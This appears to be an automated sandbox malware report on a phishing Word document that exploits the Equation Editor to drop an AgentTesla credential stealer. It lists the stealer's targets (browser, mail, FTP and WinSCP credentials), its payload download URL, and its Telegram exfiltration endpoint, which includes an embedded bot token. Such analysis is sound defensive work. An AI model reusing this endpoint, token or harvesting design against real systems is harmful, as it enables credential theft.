Source: Yara match	File source: 00000005.00000002.722261474.00000000022B1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: gudostrp.exe PID: 2576, type: MEMORYSTR

Yara detected AgentTesla

Source: Yara match	File source: 5.2.gudostrp.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.gudostrp.exe.31ca110.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.gudostrp.exe.3200330.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.gudostrp.exe.3200330.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.gudostrp.exe.31ca110.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000005.00000002.721925198.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.464298353.00000000031C9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.722361543.000000000238D000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.722327903.0000000002338000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.722261474.00000000022B1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: gudostrp.exe PID: 1212, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: gudostrp.exe PID: 2576, type: MEMORYSTR

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Source: C:\Users\user\AppData\Roaming\gudostrp.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions

Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Users\user\AppData\Roaming\gudostrp.exe	File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites\Quick Connect\			Jump to behavior
Source: C:\Users\user\AppData\Roaming\gudostrp.exe	File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml			Jump to behavior

Tries to steal Mail credentials (via file access)

Source: C:\Users\user\AppData\Roaming\gudostrp.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gudostrp.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gudostrp.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gudostrp.exe	Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities	Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\AppData\Roaming\gudostrp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data			Jump to behavior
Source: C:\Users\user\AppData\Roaming\gudostrp.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini			Jump to behavior

Yara detected Credential Stealer

Source: Yara match	File source: 00000005.00000002.722261474.00000000022B1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: gudostrp.exe PID: 2576, type: MEMORYSTR

Remote Access Functionality:

Yara detected Telegram RAT

Source: Yara match	File source: 00000005.00000002.722261474.00000000022B1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: gudostrp.exe PID: 2576, type: MEMORYSTR

Yara detected AgentTesla

Source: Yara match	File source: 5.2.gudostrp.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.gudostrp.exe.31ca110.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.gudostrp.exe.3200330.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.gudostrp.exe.3200330.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.gudostrp.exe.31ca110.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000005.00000002.721925198.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.464298353.00000000031C9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.722361543.000000000238D000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.722327903.0000000002338000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.722261474.00000000022B1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: gudostrp.exe PID: 1212, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: gudostrp.exe PID: 2576, type: MEMORYSTR

Screenshots

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Network Map

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Contacted Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
149.154.167.220	api.telegram.org	United Kingdom		62041	TELEGRAMRU	false
144.76.47.167	palangavra.lt	Germany		24940	HETZNER-ASDE	true

Contacted Domains

Name	IP	Active
api.telegram.org	149.154.167.220	true
palangavra.lt	144.76.47.167	true

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://palangavra.lt/jukiestay/gufoxqa.exe	true	Avira URL Cloud: malware	unknown

AV Detection:

Found malware configuration

Source: 5.2.gudostrp.exe.400000.1.unpack	Malware Configuration Extractor: Agenttesla {"Exfil Mode": "Telegram", "Chat id": "1366706404", "Chat URL": "https://api.telegram.org/bot2034238293:AAHoBUVeqtv7yJIYVLFYq5RA0AnxpaTX22s/sendDocument"}
Source: gudostrp.exe.2576.5.memstrmin	Malware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot2034238293:AAHoBUVeqtv7yJIYVLFYq5RA0AnxpaTX22s/sendMessage"}

Multi AV Scanner detection for submitted file

Source: Purchase Order_0131021.doc	Virustotal: Detection: 36%			Perma Link
Source: Purchase Order_0131021.doc	ReversingLabs: Detection: 35%

Antivirus detection for URL or domain

Source: http://palangavra.lt/jukiestay/gufoxqa.exe

Avira URL Cloud: Label: malware

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\gufoxqa[1].exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\gudostrp.exe	Joe Sandbox ML: detected

Exploits:

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\user\AppData\Roaming\gudostrp.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\user\AppData\Roaming\gudostrp.exe			Jump to behavior

Office Equation Editor has been started

Source: unknown

Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source: unknown

HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.22:49169 version: TLS 1.2

Software Vulnerabilities:

Potential document exploit detected (performs DNS queries)

Source: global traffic

DNS query: name: palangavra.lt

Potential document exploit detected (unknown TCP traffic)

Source: global traffic

TCP traffic: 192.168.2.22:49167 -> 144.76.47.167:80

Potential document exploit detected (performs HTTP gets)

Source: global traffic

TCP traffic: 192.168.2.22:49169 -> 149.154.167.220:443

Networking:

Uses the Telegram API (likely for C&C communication)

Source: unknown	DNS query: name: api.telegram.org
Source: unknown	DNS query: name: api.telegram.org

Internet Provider seen in connection with other malware

Source: Joe Sandbox View

ASN Name: HETZNER-ASDE HETZNER-ASDE

JA3 SSL client fingerprint seen in connection with other malware

Source: Joe Sandbox View

JA3 fingerprint: 36f7277af969a6947a61ae0b815907a1

HTTP GET or POST without a user agent

Source: global traffic

IP address seen in connection with other malware

Source: Joe Sandbox View

IP Address: 149.154.167.220 149.154.167.220

Downloads executable code via HTTP

Source: global traffic

Uses a known web browser user agent for HTTP communication

Source: global traffic

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49169
Source: unknown	Network traffic detected: HTTP traffic on port 49169 -> 443

Source: gudostrp.exe, 00000005.00000002.723097991.000000000611D000.00000004.00000001.sdmp

String found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)

Source: gudostrp.exe, 00000005.00000002.722261474.00000000022B1000.00000004.00000001.sdmp	String found in binary or memory: http://127.0.0.1:HTTP/1.1
Source: gudostrp.exe, 00000005.00000002.722261474.00000000022B1000.00000004.00000001.sdmp	String found in binary or memory: http://DynDns.comDynDNS
Source: gudostrp.exe, 00000005.00000002.722361543.000000000238D000.00000004.00000001.sdmp	String found in binary or memory: http://SwonTwAJYn3XCAV3.net
Source: gudostrp.exe, 00000005.00000002.722444907.00000000023FF000.00000004.00000001.sdmp	String found in binary or memory: http://api.telegram.org
Source: gudostrp.exe, 00000005.00000002.723097991.000000000611D000.00000004.00000001.sdmp	String found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
Source: gudostrp.exe, 00000005.00000002.723097991.000000000611D000.00000004.00000001.sdmp	String found in binary or memory: http://crl.entrust.net/2048ca.crl0
Source: gudostrp.exe, 00000005.00000002.723097991.000000000611D000.00000004.00000001.sdmp	String found in binary or memory: http://crl.entrust.net/server1.crl0
Source: gudostrp.exe, 00000005.00000002.723083857.00000000060F3000.00000004.00000001.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: gudostrp.exe, 00000005.00000002.723097991.000000000611D000.00000004.00000001.sdmp	String found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
Source: gudostrp.exe, 00000005.00000002.723097991.000000000611D000.00000004.00000001.sdmp	String found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
Source: gudostrp.exe, 00000005.00000002.723097991.000000000611D000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.comodoca.com0
Source: gudostrp.exe, 00000005.00000002.723097991.000000000611D000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.comodoca.com0%
Source: gudostrp.exe, 00000005.00000002.723097991.000000000611D000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.comodoca.com0-
Source: gudostrp.exe, 00000005.00000002.723097991.000000000611D000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.comodoca.com0/
Source: gudostrp.exe, 00000005.00000002.723097991.000000000611D000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.comodoca.com05
Source: gudostrp.exe, 00000005.00000002.723097991.000000000611D000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.entrust.net03
Source: gudostrp.exe, 00000005.00000002.723097991.000000000611D000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.entrust.net0D
Source: gudostrp.exe, 00000005.00000002.722766905.0000000005CF0000.00000002.00020000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: gudostrp.exe, 00000005.00000002.722427631.00000000023EC000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: gudostrp.exe, 00000005.00000002.722766905.0000000005CF0000.00000002.00020000.sdmp	String found in binary or memory: http://www.%s.comPA
Source: gudostrp.exe, 00000005.00000002.723097991.000000000611D000.00000004.00000001.sdmp	String found in binary or memory: http://www.digicert.com.my/cps.htm02
Source: gudostrp.exe, 00000005.00000002.723097991.000000000611D000.00000004.00000001.sdmp	String found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
Source: gudostrp.exe, 00000005.00000002.722261474.00000000022B1000.00000004.00000001.sdmp	String found in binary or memory: http://yBlQIu.com
Source: gudostrp.exe, 00000005.00000002.722427631.00000000023EC000.00000004.00000001.sdmp	String found in binary or memory: https://api.telegram.org
Source: gudostrp.exe, 00000004.00000002.464298353.00000000031C9000.00000004.00000001.sdmp, gudostrp.exe, 00000005.00000002.721925198.0000000000402000.00000040.00000001.sdmp	String found in binary or memory: https://api.telegram.org/bot2034238293:AAHoBUVeqtv7yJIYVLFYq5RA0AnxpaTX22s/
Source: gudostrp.exe, 00000005.00000002.722105371.0000000000788000.00000004.00000020.sdmp, gudostrp.exe, 00000005.00000002.722427631.00000000023EC000.00000004.00000001.sdmp	String found in binary or memory: https://api.telegram.org/bot2034238293:AAHoBUVeqtv7yJIYVLFYq5RA0AnxpaTX22s/sendDocument
Source: gudostrp.exe, 00000005.00000002.722261474.00000000022B1000.00000004.00000001.sdmp	String found in binary or memory: https://api.telegram.org/bot2034238293:AAHoBUVeqtv7yJIYVLFYq5RA0AnxpaTX22s/sendDocumentdocument-----
Source: gudostrp.exe, 00000005.00000002.722427631.00000000023EC000.00000004.00000001.sdmp	String found in binary or memory: https://api.telegram.orgP
Source: gudostrp.exe, 00000005.00000002.723097991.000000000611D000.00000004.00000001.sdmp	String found in binary or memory: https://secure.comodo.com/CPS0
Source: gudostrp.exe, 00000004.00000002.464298353.00000000031C9000.00000004.00000001.sdmp, gudostrp.exe, 00000005.00000002.721925198.0000000000402000.00000040.00000001.sdmp	String found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip
Source: gudostrp.exe, 00000005.00000002.722261474.00000000022B1000.00000004.00000001.sdmp	String found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha

Source: unknown

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{FF3D13C6-F9AF-46D5-857E-918FB2A2DE9E}.tmp

Jump to behavior

Source: unknown

DNS traffic detected: queries for: palangavra.lt

Source: global traffic

Source: unknown

HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.22:49169 version: TLS 1.2

System Summary:

Office equation editor drops PE file

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Roaming\gudostrp.exe			Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\gufoxqa[1].exe			Jump to dropped file

.NET source code contains very large array initializations

Source: 5.2.gudostrp.exe.400000.1.unpack, u003cPrivateImplementationDetailsu003eu007bCB2C1C74u002d7A68u002d46F5u002dB599u002d45991AE15A88u007d/A406E5E7u002dDEBAu002d4106u002dAAAEu002dB593294D8F00.cs

Large array initialization: .cctor: array initializer size 12005

Detected potential crypto function

Source: C:\Users\user\AppData\Roaming\gudostrp.exe	Code function: 4_2_0030348D	4_2_0030348D
Source: C:\Users\user\AppData\Roaming\gudostrp.exe	Code function: 4_2_00308ED7	4_2_00308ED7
Source: C:\Users\user\AppData\Roaming\gudostrp.exe	Code function: 4_2_00721D30	4_2_00721D30
Source: C:\Users\user\AppData\Roaming\gudostrp.exe	Code function: 4_2_01FA5EA8	4_2_01FA5EA8
Source: C:\Users\user\AppData\Roaming\gudostrp.exe	Code function: 4_2_01FA0006	4_2_01FA0006
Source: C:\Users\user\AppData\Roaming\gudostrp.exe	Code function: 4_2_01FB0048	4_2_01FB0048
Source: C:\Users\user\AppData\Roaming\gudostrp.exe	Code function: 4_2_01FB5720	4_2_01FB5720
Source: C:\Users\user\AppData\Roaming\gudostrp.exe	Code function: 4_2_01FC0048	4_2_01FC0048
Source: C:\Users\user\AppData\Roaming\gudostrp.exe	Code function: 4_2_01FC5620	4_2_01FC5620
Source: C:\Users\user\AppData\Roaming\gudostrp.exe	Code function: 4_2_01FC929C	4_2_01FC929C
Source: C:\Users\user\AppData\Roaming\gudostrp.exe	Code function: 4_2_01FD0048	4_2_01FD0048
Source: C:\Users\user\AppData\Roaming\gudostrp.exe	Code function: 4_2_01FD90FD	4_2_01FD90FD
Source: C:\Users\user\AppData\Roaming\gudostrp.exe	Code function: 4_2_01FD5908	4_2_01FD5908
Source: C:\Users\user\AppData\Roaming\gudostrp.exe	Code function: 4_2_01FD0006	4_2_01FD0006
Source: C:\Users\user\AppData\Roaming\gudostrp.exe	Code function: 4_2_02025CE8	4_2_02025CE8
Source: C:\Users\user\AppData\Roaming\gudostrp.exe	Code function: 4_2_020319A2	4_2_020319A2
Source: C:\Users\user\AppData\Roaming\gudostrp.exe	Code function: 4_2_041D0048	4_2_041D0048
Source: C:\Users\user\AppData\Roaming\gudostrp.exe	Code function: 4_2_041DE168	4_2_041DE168
Source: C:\Users\user\AppData\Roaming\gudostrp.exe	Code function: 4_2_0030364F	4_2_0030364F
Source: C:\Users\user\AppData\Roaming\gudostrp.exe	Code function: 4_2_01FB0006	4_2_01FB0006
Source: C:\Users\user\AppData\Roaming\gudostrp.exe	Code function: 5_2_00256048	5_2_00256048
Source: C:\Users\user\AppData\Roaming\gudostrp.exe	Code function: 5_2_0025F2B8	5_2_0025F2B8
Source: C:\Users\user\AppData\Roaming\gudostrp.exe	Code function: 5_2_00255430	5_2_00255430
Source: C:\Users\user\AppData\Roaming\gudostrp.exe	Code function: 5_2_0025D458	5_2_0025D458
Source: C:\Users\user\AppData\Roaming\gudostrp.exe	Code function: 5_2_00255778	5_2_00255778
Source: C:\Users\user\AppData\Roaming\gudostrp.exe	Code function: 5_2_0025AF40	5_2_0025AF40
Source: C:\Users\user\AppData\Roaming\gudostrp.exe	Code function: 5_2_00252197	5_2_00252197
Source: C:\Users\user\AppData\Roaming\gudostrp.exe	Code function: 5_2_00559C40	5_2_00559C40
Source: C:\Users\user\AppData\Roaming\gudostrp.exe	Code function: 5_2_005502F1	5_2_005502F1
Source: C:\Users\user\AppData\Roaming\gudostrp.exe	Code function: 5_2_005537E8	5_2_005537E8
Source: C:\Users\user\AppData\Roaming\gudostrp.exe	Code function: 5_2_00556E48	5_2_00556E48
Source: C:\Users\user\AppData\Roaming\gudostrp.exe	Code function: 5_2_00559468	5_2_00559468
Source: C:\Users\user\AppData\Roaming\gudostrp.exe	Code function: 5_2_0055B520	5_2_0055B520
Source: C:\Users\user\AppData\Roaming\gudostrp.exe	Code function: 5_2_00553F9D	5_2_00553F9D

Contains functionality to launch a process as a different user

Source: C:\Users\user\AppData\Roaming\gudostrp.exe

Code function: 4_2_00726CD0 CreateProcessAsUserW,

4_2_00726CD0

Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)

Source: C:\Users\user\AppData\Roaming\gudostrp.exe	Memory allocated: 76F90000 page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gudostrp.exe	Memory allocated: 76E90000 page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gudostrp.exe	Memory allocated: 76F90000 page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gudostrp.exe	Memory allocated: 76E90000 page execute and read and write	Jump to behavior

Source: Purchase Order_0131021.doc	Virustotal: Detection: 36%
Source: Purchase Order_0131021.doc	ReversingLabs: Detection: 35%

Source: C:\Users\user\AppData\Roaming\gudostrp.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
Source: unknown	Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\user\AppData\Roaming\gudostrp.exe C:\Users\user\AppData\Roaming\gudostrp.exe
Source: C:\Users\user\AppData\Roaming\gudostrp.exe	Process created: C:\Users\user\AppData\Roaming\gudostrp.exe C:\Users\user\AppData\Roaming\gudostrp.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\user\AppData\Roaming\gudostrp.exe C:\Users\user\AppData\Roaming\gudostrp.exe	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gudostrp.exe	Process created: C:\Users\user\AppData\Roaming\gudostrp.exe C:\Users\user\AppData\Roaming\gudostrp.exe	Jump to behavior

Source: C:\Users\user\AppData\Roaming\gudostrp.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{172BDDF8-CEEA-11D1-8B05-00600806D9B6}\InProcServer32

Jump to behavior

Source: C:\Users\user\AppData\Roaming\gudostrp.exe	WMI Queries: IWbemServices::CreateInstanceEnum - Win32_Processor
Source: C:\Users\user\AppData\Roaming\gudostrp.exe	WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\gudostrp.exe	WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\Desktop\~$rchase Order_0131021.doc

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\AppData\Local\Temp\CVRD1AF.tmp

Jump to behavior

Source: classification engine

Classification label: mal100.troj.spyw.expl.evad.winDOC@6/9@3/2

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\AppData\Roaming\gudostrp.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll			Jump to behavior
Source: C:\Users\user\AppData\Roaming\gudostrp.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll			Jump to behavior

Source: gudostrp.exe.2.dr, PointerToRelocations.cs	Base64 encoded string: 'KknRp7HQQvHHBtyvGqKkQPgwSxrDZccPIvljRo+32rU6dcfrjjwlA+/74UKQkI50', 'n/ZGPw0Rnde/5vrFGQTkY8FPHDUw84v1zRXhcoRNVdfo4NG1a//9Q6xctd3zCMeG', '+eXUcThFekX3G8Ul+iy8PTjd4CCEEvw/RRULKiZzJHE1VD6vEOtFO57C82jzLkjj', 'gRfomnjmScAnaVNNcbO4XwmlyiUUrURhk8amHDtWGGhvEx0K1vQimNrPR2fO3ekH'
Source: gufoxqa[1].exe.2.dr, PointerToRelocations.cs	Base64 encoded string: 'KknRp7HQQvHHBtyvGqKkQPgwSxrDZccPIvljRo+32rU6dcfrjjwlA+/74UKQkI50', 'n/ZGPw0Rnde/5vrFGQTkY8FPHDUw84v1zRXhcoRNVdfo4NG1a//9Q6xctd3zCMeG', '+eXUcThFekX3G8Ul+iy8PTjd4CCEEvw/RRULKiZzJHE1VD6vEOtFO57C82jzLkjj', 'gRfomnjmScAnaVNNcbO4XwmlyiUUrURhk8amHDtWGGhvEx0K1vQimNrPR2fO3ekH'
Source: 4.0.gudostrp.exe.1d0000.0.unpack, PointerToRelocations.cs	Base64 encoded string: 'KknRp7HQQvHHBtyvGqKkQPgwSxrDZccPIvljRo+32rU6dcfrjjwlA+/74UKQkI50', 'n/ZGPw0Rnde/5vrFGQTkY8FPHDUw84v1zRXhcoRNVdfo4NG1a//9Q6xctd3zCMeG', '+eXUcThFekX3G8Ul+iy8PTjd4CCEEvw/RRULKiZzJHE1VD6vEOtFO57C82jzLkjj', 'gRfomnjmScAnaVNNcbO4XwmlyiUUrURhk8amHDtWGGhvEx0K1vQimNrPR2fO3ekH'
Source: 4.2.gudostrp.exe.1d0000.0.unpack, PointerToRelocations.cs	Base64 encoded string: 'KknRp7HQQvHHBtyvGqKkQPgwSxrDZccPIvljRo+32rU6dcfrjjwlA+/74UKQkI50', 'n/ZGPw0Rnde/5vrFGQTkY8FPHDUw84v1zRXhcoRNVdfo4NG1a//9Q6xctd3zCMeG', '+eXUcThFekX3G8Ul+iy8PTjd4CCEEvw/RRULKiZzJHE1VD6vEOtFO57C82jzLkjj', 'gRfomnjmScAnaVNNcbO4XwmlyiUUrURhk8amHDtWGGhvEx0K1vQimNrPR2fO3ekH'
Source: 5.2.gudostrp.exe.1d0000.0.unpack, PointerToRelocations.cs	Base64 encoded string: 'KknRp7HQQvHHBtyvGqKkQPgwSxrDZccPIvljRo+32rU6dcfrjjwlA+/74UKQkI50', 'n/ZGPw0Rnde/5vrFGQTkY8FPHDUw84v1zRXhcoRNVdfo4NG1a//9Q6xctd3zCMeG', '+eXUcThFekX3G8Ul+iy8PTjd4CCEEvw/RRULKiZzJHE1VD6vEOtFO57C82jzLkjj', 'gRfomnjmScAnaVNNcbO4XwmlyiUUrURhk8amHDtWGGhvEx0K1vQimNrPR2fO3ekH'
Source: 5.0.gudostrp.exe.1d0000.0.unpack, PointerToRelocations.cs	Base64 encoded string: 'KknRp7HQQvHHBtyvGqKkQPgwSxrDZccPIvljRo+32rU6dcfrjjwlA+/74UKQkI50', 'n/ZGPw0Rnde/5vrFGQTkY8FPHDUw84v1zRXhcoRNVdfo4NG1a//9Q6xctd3zCMeG', '+eXUcThFekX3G8Ul+iy8PTjd4CCEEvw/RRULKiZzJHE1VD6vEOtFO57C82jzLkjj', 'gRfomnjmScAnaVNNcbO4XwmlyiUUrURhk8amHDtWGGhvEx0K1vQimNrPR2fO3ekH'

Source: 5.2.gudostrp.exe.400000.1.unpack, A/b2.cs	Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
Source: 5.2.gudostrp.exe.400000.1.unpack, A/b2.cs	Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gudostrp.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\AppData\Roaming\gudostrp.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Data Obfuscation:

Binary or sample is protected by dotNetProtector

Source: gudostrp.exe	String found in binary or memory: dotNetProtector
Source: gudostrp.exe, 00000004.00000002.462296022.00000000001D2000.00000020.00020000.sdmp	String found in binary or memory: kIHasFieldMarshalReplaceInternalJoinInternalSet_IsLiteralAppCompatLiteralGet_IsInternalCalladvapi32.dllkernel32.dllKillEcmaPublicKeyFullSet_PercentSymbolChangeAccessControlBlobStreamInternalLoadFromStreamCryptoStreamMemoryStreamSystemSymmetricAlgorithmHashAlgorithmFormICryptoTransformGet_InGet_IsAddOnTanConvertHijriToGregorianStrLenget_MetadataTokenResolveTokenAssignCancellationTokenlpNumberOfBytesWrittenEndStrongNameSignBeginStrongNameSignSinAppDomainget_CurrentDomainGet_EndColumnGet_RevisionApplicationget_LocationOp_UnaryNegationNineRays.Obfuscator.EvaluationNoOptimizationSystem.ReflectionGetBaseDefinitionGenericParameterPositionCallingConventionRuntimeWrappedExceptionEncoderFallbackExceptionRunGetDynamicILInfoRslvMethodFieldInfoEhEndFinallyFieldInfoMethodInfo_compareInfoMemberInfoParameterInfoDelegateCtorInfoZeroGet_IsCharSetAutoAlignUpGetInterfaceMapInitializeEventMapGet_BlobHeapTablesHeapSleepSystem.Linqset_ShowInTaskbarGet_DefaultCalendarFirstGregorianTableYearMoveRightGetCharGet_CurrentCharGet_ParamNumberGet_ManagedNativeHeaderWriteTinyHeaderGetBlobReaderSyncTextReaderDESCryptoServiceProviderMethodBuilderModuleBuilderTypeBuilderAssemblyBuilderM_lastBlockBufferlpBufferResourceManagerDebuggerSet_IsOtherget_IsModifierWSTRBufferMarshalerAddOneArgTypeHelperCheckHelperCreateAttributeArrayHelperCreateProcessAsUserget_IsPointerBitConverterResolverModuleDirGetTokenForFloorSetLastErrorIEnumeratorInitializeTypeEnumeratorGetEnumerator.ctorLoadFactor.cctordotNetProtectorget_IsConstructorCreateDecryptorFromIntPtrBuildRevisionStr/
Source: gudostrp.exe	String found in binary or memory: dotNetProtector
